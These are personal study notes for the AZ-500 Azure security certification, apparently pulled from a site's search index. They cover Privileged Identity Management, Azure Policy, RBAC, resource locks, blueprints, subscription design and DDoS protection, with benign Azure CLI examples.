                            Make sure there are always at least two users in a Privileged Role Administrator role, in case one user is locked out or their account is deleted.

When creating an assignment, something I didn't know when setting it up is the type of the assignment:

• Eligible assignments require the member of the role to perform an action to use the role. Actions might include activation or requesting approval from designated approvers.
• Active assignments don't require the member to perform any action to use the role. Members assigned as active have the privileges assigned to the role.

How is a role activated? If users have been made eligible for a role, they must activate the role assignment before using it. To activate the role, users select a specific activation duration within the maximum (configured by administrators) and give the reason for the activation request. If the role requires approval to activate, a notification appears in the upper right corner of the user's browser, informing them the request is pending approval. If approval isn't required, the member can start using the role. Delegated approvers receive email notifications when a role request is pending their approval. Approvers can view, approve, or deny these pending requests in PIM. After the request has been approved, the member can start using the role. For example, if a user or a group was assigned the Contributor role on a resource group, they'll be able to manage that particular resource group.
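
As a rough sketch of self-activation outside the portal, the Graph v1.0 PIM API accepts a role assignment schedule request like the one below; the IDs, start time, duration, and justification are placeholders, and the caller must actually hold an eligible assignment for the role.

```bash
# Self-activate an eligible Azure AD role for four hours.
az rest --method POST \
  --url "https://graph.microsoft.com/v1.0/roleManagement/directory/roleAssignmentScheduleRequests" \
  --headers "Content-Type=application/json" \
  --body '{
    "action": "selfActivate",
    "principalId": "<your-user-object-id>",
    "roleDefinitionId": "<role-definition-id>",
    "directoryScopeId": "/",
    "justification": "Investigate ticket INC-1234",
    "scheduleInfo": {
      "startDateTime": "2024-06-08T17:00:00Z",
      "expiration": { "type": "afterDuration", "duration": "PT4H" }
    }
  }'
```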

Extending or renewing assignments requires approval from a Global Administrator or Privileged Role Administrator. Notifications can be sent to Admins, Requestors, and Approvers.

                            Privileged Role Administrator permissions

                            • Enable approval for specific roles
                            • Specify approver users or groups to approve requests
                            • View request and approval history for all privileged roles

                            Approver permissions

                            • View pending approvals (requests)
                            • Approve or reject requests for role elevation (single and bulk)
• Provide justification for their approval or rejection

                            Eligible role user permissions

                            • Request activation of a role that requires approval
                            • View the status of your request to activate
                            • Complete your task in Azure AD if activation was approved

                            Assignment settings:

• Allow permanent eligible assignment. Global admins and Privileged Role admins can assign permanent eligible assignments. They can also require that all eligible assignments have a specified start and end date.
• Allow permanent active assignment. Global admins and Privileged Role admins can assign permanent active assignments. They can also require that all active assignments have a specified start and end date.

                            Implement a privileged identity management workflow

                            By configuring Azure AD PIM to manage our elevated access roles in Azure AD, we now have JIT access for more than 28 configurable privileged roles. We can also monitor access, audit account elevations, and receive additional alerts through a management dashboard in the Azure portal.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#5-design-an-enterprise-governance-strategy-azure-resource-manager","title":"5. Design an Enterprise Governance strategy: Azure Resource Manager","text":"

Regardless of the deployment type, you always retain responsibility for the following:

                            • Data
                            • Endpoints
                            • Accounts
                            • Access management

Azure Resource Manager is the deployment and management service for Azure. It provides a consistent management layer that allows you to create, update, and delete resources in your Azure subscription. You can use its access control, auditing, and tagging features to help secure and organize your resources after deployment.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#51-resource-groups","title":"5.1. Resource Groups","text":"

Resource Groups - There are some important factors to consider when defining your resource group (a CLI sketch follows this list):

• All the resources in your group should share the same lifecycle. You deploy, update, and delete them together. If one resource, such as a database server, needs to exist on a different deployment cycle, it should be in another resource group.
                            • Each resource can only exist in one resource group.
                            • You can add or remove a resource to a resource group at any time.
                            • You can move a resource from one resource group to another group.
                            • A resource group can contain resources that are located in different regions.
                            • A resource group can be used to scope access control for administrative actions.
                            • A resource can interact with resources in other resource groups. This interaction is common when the two resources are related but don't share the same lifecycle (for example, web apps connecting to a database).
                            • If the resource group's region is temporarily unavailable, you can't update resources in the resource group because the metadata is unavailable. The resources in other regions will still function as expected, but you can't update them.
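
A minimal CLI sketch of that lifecycle, with illustrative names and a placeholder subscription ID:

```bash
# Create a resource group in a region.
az group create --name rg-app-prod --location westeurope

# Move a resource into another group; the resource keeps running, but both
# groups are locked for further moves until the operation completes.
az resource move \
  --destination-group rg-app-shared \
  --ids "/subscriptions/<sub-id>/resourceGroups/rg-app-prod/providers/Microsoft.Storage/storageAccounts/stappprod01"
```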
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#52-management-groups","title":"5.2. Management Groups","text":"
• Provide user access to multiple subscriptions
• Allow new organizational models and logical grouping of resources
• Allow a single assignment of controls that applies to all subscriptions
• Provide aggregated views above the subscription level

Mirror your organization's structure:

• Create a flexible hierarchy that can be updated quickly.
• The hierarchy does not need to model the organization's billing hierarchy.
• The structure can easily scale up or down depending on your needs.

Apply policies or access controls to any service (a CLI sketch follows):

• Create one RBAC assignment on the management group, which will inherit that access to all the subscriptions.
• Use Azure Resource Manager integrations that allow integrations with other Azure services: Azure Cost Management, Privileged Identity Management, and Microsoft Defender for Cloud.
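
A minimal sketch of both ideas with the Azure CLI, using illustrative names: create a management group, place a subscription under it, and make a single RBAC assignment at the management group scope so every subscription below inherits it.

```bash
# Create the management group and add a subscription to it.
az account management-group create --name corp-platform --display-name "Corp Platform"
az account management-group subscription add \
  --name corp-platform --subscription "<subscription-id>"

# One Reader assignment at the management group scope covers all child subscriptions.
az role assignment create \
  --assignee "secops@contoso.com" \
  --role "Reader" \
  --scope "/providers/Microsoft.Management/managementGroups/corp-platform"
```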

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#53-azure-policies","title":"5.3. Azure policies","text":"

                            Configure Azure policies - Azure Policy is a service you use to create, assign, and manage policies. These policies enforce different rules and effects over your resources so that those resources stay compliant with your corporate standards and service level agreements.

The first pillar is real-time enforcement and compliance assessment.

The second pillar of policy is applying policies at scale by leveraging Management Groups. There is also a concept called policy initiative that allows you to group policies together so that you can view the aggregated compliance result. At the initiative level there's also a concept called exclusion, where one can exclude either a child management group, subscription, resource group, or resources from the policy assignment.

The third pillar of policy is remediation: a remediation task automatically remediates non-compliant resources so that your environment always stays compliant. Existing resources will be flagged as non-compliant but won't automatically be changed, because there can be impact to the environment.

                            Some built-in roles in Azure Policy resources:

                            • Resource Policy Owner
                            • Resource Policy Contributor
                            • Resource Policy Reader

                            There are two resource providers for Azure Policy operations (or permissions):

                            • Microsoft.Authorization
                            • Microsoft.PolicyInsights

                            If a custom policy is needed these are the steps:

                            • Identify your business requirements
                            • Map each requirement to an Azure resource property
                            • Map the property to an alias
                            • Determine which effect to use
                            • Compose the policy definition

                            Let's do it:

• Policy definition - Every policy definition has conditions under which it's enforced. It also has a defined effect that takes place if the conditions are met.
• Policy assignment - A policy definition that has been assigned to take place within a specific scope. This scope could range from a management group to an individual resource. The term scope refers to all the resources, resource groups, subscriptions, or management groups that the policy definition is assigned to.
• Policy parameters - They help simplify your policy management by reducing the number of policy definitions you must create. You can define parameters when creating a policy definition to make it more generic.

In order to easily track compliance for multiple resources, create and assign an Initiative definition.
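
As a small example of definition, assignment, and parameters working together, the sketch below assigns the built-in "Allowed locations" policy (referenced by its well-known definition ID) at a resource group scope; the scope and region list are illustrative.

```bash
# Assign the built-in "Allowed locations" policy and pass its parameter.
az policy assignment create \
  --name "allowed-locations-rg" \
  --display-name "Allowed locations (rg-app-prod)" \
  --policy "e56962a6-4747-49cd-b67b-bf8b01975c4c" \
  --scope "/subscriptions/<sub-id>/resourceGroups/rg-app-prod" \
  --params '{ "listOfAllowedLocations": { "value": ["westeurope", "northeurope"] } }'

# Summarize the compliance state afterwards.
az policy state summarize --resource-group rg-app-prod
```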

All Policy objects, including definitions, initiatives, and assignments, are readable by all roles over their scope. For example, a Policy assignment scoped to an Azure subscription is readable by all role holders at the subscription scope and below.

A contributor may trigger resource remediation but can't create or update definitions and assignments. User Access Administrator is necessary to grant the managed identity on deployIfNotExists or modify assignments the necessary permissions.

                            Each policy definition in Azure Policy has a single effect. That effect determines what happens when the policy rule is evaluated to match. The effects behave differently if they are for a new resource, an updated resource, or an existing resource.

                            These effects are currently supported in a policy definition:

                            • Append
                            • Audit
                            • AuditIfNotExists
                            • Deny
                            • DenyAction
                            • DeployIfNotExists
                            • Disabled
                            • Manual
                            • Modify
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#54-enable-role-based-access-control-rbac","title":"5.4. Enable Role-Based Access Control (RBAC)","text":"

                            RBAC is an authorization system built on Azure Resource Manager that provides fine-grained access management of Azure resources. Each Azure subscription is associated with one Azure AD directory. Users, groups, and applications in that directory can manage resources in the Azure subscription. Grant access by assigning the appropriate RBAC role to users, groups, and applications at a certain scope. The scope of a role assignment can be a subscription, a resource group, or a single resource.

                            Note that a subscription is associated with only one Azure AD tenant. Also note that a resource group can have multiple resources but is associated with only one subscription. Lastly, a resource can be bound to only one resource group.

                            The four general built-in roles are:

• Contributor - Grants full access to manage all resources, but does not allow you to assign roles in Azure RBAC, manage assignments in Azure Blueprints, or share image galleries.
• Owner - Grants full access to manage all resources, including the ability to assign roles in Azure RBAC.
• Reader - View all resources, but does not allow you to make any changes.
• User Access Administrator - Lets you manage user access to Azure resources.

                            If the built-in roles for Azure resources don't meet the specific needs of your organization, you can create your own custom roles. Just like built-in roles, you can assign custom roles to users, groups, and service principals at management group, subscription, and resource group scopes.
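
A minimal sketch of a custom role; the "Virtual Machine Operator" name, its actions, and the subscription ID are illustrative.

```bash
# Describe the custom role in JSON.
cat > vm-operator.json <<'EOF'
{
  "Name": "Virtual Machine Operator",
  "Description": "Can monitor, start, and restart virtual machines.",
  "Actions": [
    "Microsoft.Compute/virtualMachines/read",
    "Microsoft.Compute/virtualMachines/start/action",
    "Microsoft.Compute/virtualMachines/restart/action"
  ],
  "NotActions": [],
  "AssignableScopes": ["/subscriptions/<sub-id>"]
}
EOF

# Create the role, then assign it like any built-in role.
az role definition create --role-definition @vm-operator.json
az role assignment create \
  --assignee "ops-team@contoso.com" \
  --role "Virtual Machine Operator" \
  --scope "/subscriptions/<sub-id>/resourceGroups/rg-app-prod"
```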

Limits for custom roles:

• Each directory can have up to 5000 custom roles.
                            • Azure Germany and Azure China 21Vianet can have up to 2000 custom roles for each directory.
                            • You cannot set AssignableScopes to the root scope (\"/\").
                            • You can only define one management group in AssignableScopes of a custom role. Adding a management group to AssignableScopes is currently in preview.
                            • Custom roles with DataActions cannot be assigned at the management group scope.
                            • Azure Resource Manager doesn't validate the management group's existence in the role definition's assignable scope.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#55-enable-resource-locks","title":"5.5. Enable resource locks","text":"

You can set the lock level to CanNotDelete or ReadOnly. In the portal, the locks are called Delete and Read-only respectively.

• CanNotDelete means authorized users can still read and modify a resource, but they can't delete the resource.
• ReadOnly means authorized users can read a resource, but they can't delete or update the resource. Applying this lock is similar to restricting all authorized users to the permissions granted by the Reader role.

To create or delete management locks, you must have access to Microsoft.Authorization/* or Microsoft.Authorization/locks/* actions. Of the built-in roles, only Owner and User Access Administrator are granted those actions.
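
For example, a CanNotDelete lock on a resource group might be managed like this (names are illustrative):

```bash
# Lock the group against deletion; reads and updates still work.
az lock create --name no-delete --lock-type CanNotDelete --resource-group rg-app-prod

# List and, when appropriate, remove locks.
az lock list --resource-group rg-app-prod --output table
az lock delete --name no-delete --resource-group rg-app-prod
```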

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#56-deploy-azure-blueprints","title":"5.6. Deploy Azure blueprints","text":"

                            Blueprints are a declarative way to orchestrate the deployment of various resource templates and other artifacts, such as:

                            • Role Assignments
                            • Policy Assignments
                            • Azure Resource Manager templates
                            • Resource Groups

The Azure Blueprints service is supported by the globally distributed Azure Cosmos DB. Blueprint objects are replicated in multiple Azure regions. This replication provides low latency, high availability, and consistent access to your blueprint objects, regardless of which region Blueprints deploys your resources to.

The Azure Resource Manager template is used for deployments of one or more Azure resources, but once those resources deploy, there's no active connection or relationship to the template. Blueprints save the relationship between the blueprint definition and the blueprint assignment. This connection supports improved tracking and auditing of deployments. Each blueprint can consist of zero or more Resource Manager template artifacts. This support means that previous efforts to develop and maintain a library of Resource Manager templates are reusable in Blueprints.

Blueprint definition - A blueprint is composed of artifacts. Azure Blueprints currently supports the following resources as artifacts:

Artifact (hierarchy options) - Description:

• Resource Groups (Subscription) - Create a new resource group for use by other artifacts within the blueprint. These placeholder resource groups enable you to organize resources exactly how you want them structured and provide a scope limiter for included policy and role assignment artifacts and ARM templates.
• ARM template (Subscription, Resource Group) - Templates, including nested and linked templates, are used to compose complex environments. Example environments: a SharePoint farm, Azure Automation State Configuration, or a Log Analytics workspace.
• Policy Assignment (Subscription, Resource Group) - Allows assignment of a policy or initiative to the subscription the blueprint is assigned to. The policy or initiative must be within the scope of the blueprint definition location. If the policy or initiative has parameters, these parameters are assigned at the creation of the blueprint or during blueprint assignment.
• Role Assignment (Subscription, Resource Group) - Add an existing user or group to a built-in role to make sure the right people always have the right access to your resources. Role assignments can be defined for the entire subscription or nested to a specific resource group included in the blueprint.

Blueprint definition locations - When creating a blueprint definition, you'll define where the blueprint is saved. Blueprints can be saved to a management group or subscription that you have Contributor access to. If the location is a management group, the blueprint is available to assign to any child subscription of that management group.

Blueprint parameters - Blueprints can pass parameters to either a policy/initiative or an ARM template. When adding either artifact to a blueprint, the author decides to provide a defined value for each blueprint assignment or to allow each blueprint assignment to provide a value at assignment time.

Assigning a blueprint definition to a management group means the assignment object exists in the management group. The deployment of artifacts still targets a subscription. To perform a management group assignment, the Create Or Update REST API must be used, and the request body must include a value for properties.scope to define the target subscription.
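
A hedged sketch of the define, publish, and assign flow with the Azure CLI; this relies on the separate blueprint extension, names are illustrative, and flag names can vary between extension versions.

```bash
# The blueprint commands live in a separate CLI extension.
az extension add --name blueprint

# Create a draft blueprint definition saved at a management group.
az blueprint create \
  --management-group corp-platform \
  --name corp-baseline \
  --description "Baseline resource groups, policies, and RBAC"

# Publish an immutable version of the definition.
az blueprint publish \
  --management-group corp-platform \
  --blueprint-name corp-baseline \
  --version v1

# Assign that version to the current subscription.
az blueprint assignment create \
  --name corp-baseline-v1 \
  --location westeurope \
  --identity-type SystemAssigned \
  --blueprint-version "/providers/Microsoft.Management/managementGroups/corp-platform/providers/Microsoft.Blueprint/blueprints/corp-baseline/versions/v1"
```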

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/#57-design-an-azure-subscription-management-plan","title":"5.7. Design an Azure subscription management plan","text":"

                            Capturing subscription requirements and designing target subscriptions include several factors which are based on:

                            • environment type
                            • ownership and governance model
                            • organizational structure
                            • application portfolios

                            Organization and governance design considerations

• Subscriptions serve as boundaries for Azure Policy assignments. For example, workloads subject to the Payment Card Industry (PCI) standard may need their own subscription with dedicated policies.
                            • Subscriptions serve as a scale unit so component workloads can scale within platform subscription limits.
                            • Subscriptions provide a management boundary for governance and isolation that clearly separates concerns.
                            • Create separate platform subscriptions for management (monitoring), connectivity, and identity when they're required.
                            • Use manual processes to limit Azure AD tenants to only Enterprise Agreement enrollment subscriptions.
                            • See the Azure subscription and reservation transfer hub for subscription transfers between Azure billing offers.

                            Quota and capacity design considerations

                            Azure regions might have a finite number of resources. As a result, available capacity and Stock-keeping units (SKUs) should be tracked for Azure adoptions involving a large number of resources.

                            • Consider limits and quotas within the Azure platform for each service your workloads require.
                            • Consider the availability of required SKUs within your chosen Azure regions.
                            • Consider that subscription quotas aren't capacity guarantees and are applied on a per-region basis.
                            • Consider reusing unused or decommissioned subscriptions.

                            Tenant transfer restriction design considerations

                            • Each Azure subscription is linked to a single Azure AD tenant, which acts as an identity provider (IdP) for your Azure subscription. The Azure AD tenant is used to authenticate users, services, and devices.
                            • The Azure AD tenant linked to your Azure subscription can be changed by any user with the required permissions.

                            Transferring to another Azure AD tenant is not supported for Azure Cloud Solution Provider (CSP) subscriptions.

• With Azure landing zones, you can set requirements to prevent users from transferring subscriptions to your organization's Azure AD tenant. Review the process in Manage Azure subscription policies. Configure your subscription policy by providing a list of exempted users. Exempted users are permitted to bypass restrictions set in the policy. An exempted users list is not an Azure Policy. You can only specify individual user accounts as exempted users, not Azure AD groups.
                            • Consider whether users with Visual Studio/MSDN Azure subscriptions should be allowed to transfer their subscription to or from your Azure AD tenant.
                            • Tenant transfer settings are only configurable by users with the Azure AD Global Administrator role assigned.

                            • All users with access to Azure can view the policy defined for your Azure AD tenant.

                              • Users can't view your exempted users list.
                              • Users can view the global administrators within your Azure AD tenant.
                            • Azure subscriptions transferred into an Azure AD tenant are placed into the default management group for that tenant.

                            • If approved by your organization, your application team can define a process to allow Azure subscriptions to be transferred to or from an Azure AD tenant.

                            Establish cost management design considerations

• Cost transparency is a critical management challenge every large enterprise organization faces.
• Shared platform as a service (PaaS) resources, like Azure App Service Environment and Azure Kubernetes Service, might need to be shared across teams to achieve higher density, which can require chargeback models.
                            • Use a shutdown schedule for nonproduction workloads to optimize costs.
                            • Use Azure Advisor to check recommendations for optimizing costs.
• Establish a chargeback model for better distribution of cost across your organization.
                            • Implement policy to prevent the deployment of resources not authorized to be deployed in your organization's environment.
                            • Establish a regular schedule and cadence to review cost and right size resources for workloads.

                            Organization and governance recommendations

                            • Treat subscriptions as a unit of management aligned with your business needs and priorities.
                            • Make subscription owners aware of their roles and responsibilities.
                              • Do a quarterly or yearly access review for Azure AD Privileged Identity Management to ensure that privileges don't proliferate as users move within your organization.
                              • Take full ownership of budget spending and resources.
                              • Ensure policy compliance and remediate when necessary.
                            • Reference the following principles as you identify requirements for new subscriptions:
  • Scale limits: Subscriptions serve as a scale unit for component workloads to scale within platform subscription limits. Large specialized workloads like high-performance computing, Internet of Things (IoT), and SAP should use separate subscriptions to avoid running up against these limits.
  • Management boundary: Subscriptions provide a management boundary for governance and isolation, allowing a clear separation of concerns. Different environments, such as development, test, and production, are often isolated from a management perspective.
  • Policy boundary: Subscriptions serve as a boundary for Azure Policy assignments. For example, secure workloads like PCI typically require additional policies in order to achieve compliance; using a separate subscription keeps that extra overhead from affecting other workloads. Development environments have more relaxed policy requirements than production environments.
  • Target network topology: You can't share virtual networks across subscriptions, but you can connect them with different technologies like virtual network peering or Azure ExpressRoute. When deciding if you need a new subscription, consider which workloads need to communicate with each other.
                            • Group subscriptions together under management groups, which are aligned with your management group structure and policy requirements. Grouping subscriptions ensures that subscriptions with the same set of policies and Azure role assignments all come from a management group.
• Establish a dedicated management subscription in your Platform management group to support global management capabilities like Azure Monitor Log Analytics workspaces and Azure Automation runbooks.
• Establish a dedicated identity subscription in your Platform management group to host Windows Server Active Directory domain controllers when necessary.
• Establish a dedicated connectivity subscription in your Platform management group to host an Azure Virtual WAN hub, private Domain Name System (DNS), ExpressRoute circuit, and other networking resources. A dedicated subscription ensures that all your foundation network resources are billed together and isolated from other workloads.
                            • Avoid a rigid subscription model. Instead, use a set of flexible criteria to group subscriptions across your organization.

                            Quota and capacity recommendations

                            • Use subscriptions as scale units, and scale out resources and subscriptions as required. Your workload can then use the required resources for scaling out without hitting subscription limits in the Azure platform.
                            • Use reserved instances to manage capacity in some regions. Your workload can then have the required capacity for high demand resources in a specific region.
• Establish a dashboard with custom views to monitor used capacity levels, and set up alerts if capacity is approaching critical levels (for example, 90 percent CPU usage).
• Raise support requests for quota increases under subscription provisioning, such as for total available VM cores within a subscription (see the sketch after this list). Ensure that your quota limits are set before your workloads exceed the default limits.
                            • Ensure that any required services and features are available within your chosen deployment regions.
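
A quick way to compare current usage against quota per region from the CLI:

```bash
# Cores, VMs, and related compute quotas for a region.
az vm list-usage --location westeurope --output table

# Network quotas have their own usage listing.
az network list-usages --location westeurope --output table
```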

                            Automation recommendations

• Build a subscription vending process to automate the creation of subscriptions for application teams via a request workflow, as described in Subscription vending.

                            Tenant transfer restriction recommendations

                            • Configure the following settings to prevent users from transferring Azure subscriptions to or from your Azure AD tenant:
                              • Set Subscription leaving Azure AD directory to Permit no one.
                              • Set Subscription entering Azure AD directory to Permit no one.
                            • Configure a limited list of exempted users.
                              • Include members from an Azure PlatformOps (platform operations) team.
                              • Include break-glass accounts in the list of exempted users.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/","title":"II. Platform protection","text":"Sources of this notes
                            • The Microsoft e-learn platform.
                            • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
                            • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
                            • Udemy course: Azure Security: AZ-500 (updated July 2023)
                            Summary: AZ-500 Microsoft Azure Security Engineer Certification
                            • About the certificate
                            • I. Manage Identity and Access
                            • II. Platform protection
                            • III. Data and applications
                            • IV. Security operations
                            • AZ-500 and more: keep learning

                            Cheatsheets: Azure-CLI | Azure PowerShell

                            100 questions you should pass for the AZ-500 certificate

This entire section is about implementing security with a defense-in-depth approach in mind.

• Azure Network Security Groups can be used for basic layer 3 & 4 access controls between Azure Virtual Networks, their subnets, and the Internet.
• Application Security Groups enable you to define fine-grained network security policies based on workloads, centered on applications, instead of explicit IP addresses.
• Azure Web Application Firewall and the Azure Firewall can be used for more advanced network access controls that require application layer support.
• Local Administrator Password Solution (LAPS) or a third-party Privileged Access Management solution can set strong local admin passwords and provide just-in-time access to them.
                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#1-perimeter-security","title":"1. Perimeter security","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#11-azure-networking-components","title":"1.1. Azure networking components","text":"

                            Azure Virtual Networks are a key component of Azure security services. The Azure network infrastructure enables you to securely connect Azure resources to each other with virtual networks (VNets). A VNet is a representation of your own network in the cloud. A VNet is a logical isolation of the Azure cloud network dedicated to your subscription. You can connect VNets to your on-premises networks.

Azure supports dedicated WAN link connectivity to your on-premises network and an Azure Virtual Network with ExpressRoute. The link between Azure and your site uses a dedicated connection that does not go over the public Internet.

                            Virtual networks

Virtual networks in Azure are network overlays that you can use to configure and control the connectivity among Azure resources, such as VMs and load balancers. A virtual network is scoped to a single Azure region. Virtual networks are made up of subnets. A subnet is a range of IP addresses within your virtual network. Subnets, like virtual networks, are scoped to a single Azure region. You can implement multiple virtual networks within each Azure subscription and Azure region. Each virtual network is isolated from other virtual networks. For each virtual network you can:

• Specify a custom private IP address space using public and private addresses. Azure assigns resources in a virtual network a private IP address from the address space that you assign.
• Segment the virtual network into one or more subnets and allocate a portion of the virtual network's address space to each subnet.
• Use Azure-provided name resolution, or specify your own DNS server, for use by resources in a virtual network.

                            IP addresses

VMs, Azure load balancers, and application gateways in a single virtual network require unique Internet Protocol (IP) addresses the same way that clients in an on-premises subnet do. This enables these resources to communicate with each other:

• Private - A private IP address is dynamically or statically allocated to a VM from the defined scope of IP addresses in the virtual network. VMs use these addresses to communicate with other VMs in the same or connected virtual networks through a gateway / Azure ExpressRoute connection. These private IP addresses, or non-routable IP addresses, conform to RFC 1918.
• Public - Public IP addresses, which allow Azure resources to communicate with external clients, are assigned directly at the virtual network adapter of the VM or to the load balancer. Public IP addresses can also be added to Azure-only virtual networks. All IP blocks in the virtual network will be routable only within the customer's network, and they won't be reachable from outside. Virtual network packets travel through the high-speed Azure backplane.

                            You can control the dynamic IP addresses assigned to VMs and cloud services within an Azure virtual network by specifying an IP addressing scheme.

                            Subnets

                            Each subnet contains a range of IP addresses that fall within the virtual network address space. Subnetting hides the details of internal network organization from external routers. Subnetting also segments the host within the network, making it easier to apply network security at the interconnections between subnets.
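
A minimal sketch of carving a virtual network into subnets; address ranges and names are illustrative.

```bash
# Create a VNet with a custom private address space and a first subnet.
az network vnet create \
  --resource-group rg-app-prod \
  --name vnet-app \
  --address-prefix 10.10.0.0/16 \
  --subnet-name snet-web \
  --subnet-prefix 10.10.1.0/24

# Add a second subnet from the same address space.
az network vnet subnet create \
  --resource-group rg-app-prod \
  --vnet-name vnet-app \
  --name snet-db \
  --address-prefix 10.10.2.0/24
```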

                            Network adapters

VMs communicate with other VMs and other resources on the network by using virtual network adapters. Virtual network adapters configure VMs with private and, optionally, public IP addresses. A VM can have more than one network adapter for different network configurations.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#12-azure-distributed-denial-of-service-ddos-protection","title":"1.2. Azure Distributed Denial of Service (DDoS) Protection","text":"

                            Best practices for building DDoS-resilient services in Azure:

                            1. Ensure that security is a priority throughout the entire lifecycle of an application, from design and implementation to deployment and operations. Applications might have bugs that allow a relatively low volume of requests to use a lot of resources, resulting in a service outage.

For this, take into account these pillars:

• Scalability - The ability of a system to handle increased load.
• Availability - The proportion of time that a system is functional and working.
• Resiliency - The ability of a system to recover from failures and continue to function.
• Management - Operations processes that keep a system running in production.
• Security - Protecting applications and data from threats.

2. Design your applications to scale horizontally to meet the demands of an amplified load, specifically in the event of a DDoS attack. If your application depends on a single instance of a service, it creates a single point of failure. Provisioning multiple instances makes your system more resilient and more scalable.

For this, these are valid ways to address it:

• For Azure App Service, select an App Service plan that offers multiple instances.
• For Azure Cloud Services, configure each of your roles to use multiple instances.
• For Azure Virtual Machines, ensure that your VM architecture includes more than one VM and that each VM is included in an availability set. We recommend using virtual machine scale sets for autoscaling capabilities.

                            3. Layer security defenses in an application to reduce the chance of a successful attack. Implement security-enhanced designs for your applications by using the built-in capabilities of the Azure platform.

This would be an approach to address it: be aware that the risk of attack increases with the size, or surface area, of the application. You can reduce the surface area by using IP allowlists to close down the exposed IP address space and listening ports that aren't needed on the load balancers (for Azure Load Balancer and Azure Application Gateway). You can also use NSGs to reduce the attack surface. You can use service tags and application security groups as a natural extension of an application's structure to minimize complexity for creating security rules and configuring network security.

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#configure-a-distributed-denial-of-service-protection-implementation","title":"Configure a distributed denial of service protection implementation","text":"

Azure Distributed Denial of Service (DDoS) protection, combined with application design best practices, provides defense against DDoS attacks. Azure DDoS protection provides the following service tiers:

• Basic: Automatically enabled as part of the Azure platform. Always-on traffic monitoring and real-time mitigation of common network-level attacks provide the same defenses utilized by Microsoft's online services. The entire scale of Azure's global network can be used to distribute and mitigate attack traffic across regions. Protection is provided for IPv4 and IPv6 Azure public IP addresses.
• Standard: Provides additional mitigation capabilities over the Basic service tier that are tuned specifically to Azure Virtual Network resources. DDoS Protection Standard is simple to enable and requires no application changes. Protection policies are tuned through dedicated traffic monitoring and machine learning algorithms. Policies are applied to public IP addresses associated with resources deployed in virtual networks, such as Azure Load Balancer, Azure Application Gateway, and Azure Service Fabric instances, but this protection does not apply to App Service Environments. Real-time telemetry is available through Azure Monitor views during an attack, and for history. Rich attack mitigation analytics are available via diagnostic settings. Application layer protection can be added through the Azure Application Gateway Web Application Firewall or by installing a third-party firewall from Azure Marketplace. Protection is provided for IPv4 and IPv6 Azure public IP addresses.

DDoS Protection Standard monitors actual traffic utilization and constantly compares it against the thresholds defined in the DDoS policy. When the traffic threshold is exceeded, DDoS mitigation is automatically initiated. When traffic returns to a level below the threshold, the mitigation is removed. During mitigation, DDoS Protection redirects traffic sent to the protected resource and performs several checks, including:

• Helping ensure that packets conform to internet specifications and aren't malformed.
• Interacting with the client to determine whether the traffic might be spoofed (for example, using SYN Auth or SYN Cookie, or dropping a packet for the source to retransmit it).
• Rate-limiting packets if it can't perform any other enforcement method.

                            DDoS Protection blocks attack traffic and forwards the remaining traffic to its intended destination. Within a few minutes of attack detection, you\u2019ll be notified with Azure Monitor metrics. By configuring logging on DDoS Protection Standard telemetry, you can write the logs to available options for future analysis. Azure Monitor retains metric data for DDoS Protection Standard for 30 days.

                            DDoS Protection Standard can mitigate the following types of attacks:

• Volumetric attacks: The attack's goal is to flood the network layer with a substantial amount of seemingly legitimate traffic. These include UDP floods, amplification floods, and other spoofed-packet floods. DDoS Protection Standard automatically mitigates these potential multi-gigabyte attacks by absorbing and scrubbing them with Azure's global network scale.
• Protocol attacks: These attacks render a target inaccessible by exploiting a weakness in the layer 3 and layer 4 protocol stack. They include SYN flood attacks, reflection attacks, and other protocol attacks. DDoS Protection Standard mitigates these attacks by interacting with the client to differentiate between malicious and legitimate traffic, and blocking the malicious traffic.
• Resource (application) layer attacks: These attacks target web application packets to disrupt the transmission of data between hosts. They include HTTP protocol violations, SQL injection, cross-site scripting, and other layer 7 attacks. Use a Web Application Firewall, such as the Azure Application Gateway web application firewall, together with DDoS Protection Standard to provide defense against these attacks. There are also third-party web application firewall offerings available in the Azure Marketplace.

                            DDoS Protection Standard protects resources in a virtual network including public IP addresses associated with virtual machines, load balancers, and application gateways. When coupled with the Application Gateway web application firewall, or a third-party web application firewall deployed in a virtual network with a public IP, DDoS Protection Standard can provide full layer 3 to layer 7 mitigation capability.
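
On the CLI side, a minimal sketch of enabling this protection might look like the following; MyResourceGroup, MyDdosPlan, and MyVnet are placeholder names, and the flags should be checked against your Azure CLI version:

```bash
# Create a DDoS protection plan (placeholder names throughout)
az network ddos-protection create \
  --resource-group MyResourceGroup \
  --name MyDdosPlan

# Associate the plan with an existing virtual network and turn protection on
az network vnet update \
  --resource-group MyResourceGroup \
  --name MyVnet \
  --ddos-protection-plan MyDdosPlan \
  --ddos-protection true
```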

                            ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-ad-2-platform-protection/#13-azure-firewall","title":"1.3. Azure Firewall","text":"

                            Azure Firewall\u00a0is a managed, cloud-based network security service that protects your Azure Virtual Network resources. It\u2019s a fully stateful firewall-as-a-service with built-in high availability and unrestricted cloud scalability. By default, Azure Firewall blocks traffic.

                            • Built-in high availability\u00a0- Because high availability is built in, no additional load balancers are required and there\u2019s nothing you need to configure.
